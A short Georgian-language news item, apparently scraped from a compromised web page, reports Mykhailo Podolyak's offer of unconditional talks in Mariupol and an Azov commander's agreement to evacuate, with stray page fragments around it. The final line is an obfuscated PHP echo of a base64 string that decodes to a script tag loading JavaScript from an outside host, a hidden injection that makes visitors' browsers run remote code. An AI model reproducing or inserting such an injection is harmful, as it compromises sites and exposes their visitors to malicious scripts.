celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველი მიხაილო პოდოლიაკი ამბობს, რომ უკრაინა მზად არის, ყველანაირი პირობის გარეშე, მარიუპოლში მოლაპარაკებები გამართოს.
 
"ყოველგვარი პირობის გარეშე, ჩვენ მზად ვართ, მოლაპარაკებების სპეციალური რაუნდი მარიუპოლში გავმართოთ. ერთი ერთზე, ორი ორზე, რათა ჩვენი ბიჭები, აზოვი, სამხედროები, მშვიდობიანი მოსახლეობა, ბავშვები, ცოცხლები და დაჭრილები გადავარჩინოთ, ყველა, იმიტომ რომ ჩვენები არიან. იმიტომ რომ ისინი ჩემს გულში არიან, სამუდამოდ", - წერს პოდოლიაკი twitter-ზე.
 
ცნობისთვის, „აზოვის პოლკის“ მეთაურის მოადგილემ, სვიატოსლავ პალამარმა განაცხადა, რომ მარიუპოლის მცველები მესამე ქვეყნის მხარდაჭერით ქალაქიდან ევაკუაციაზე თანახმა არიან.
735
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");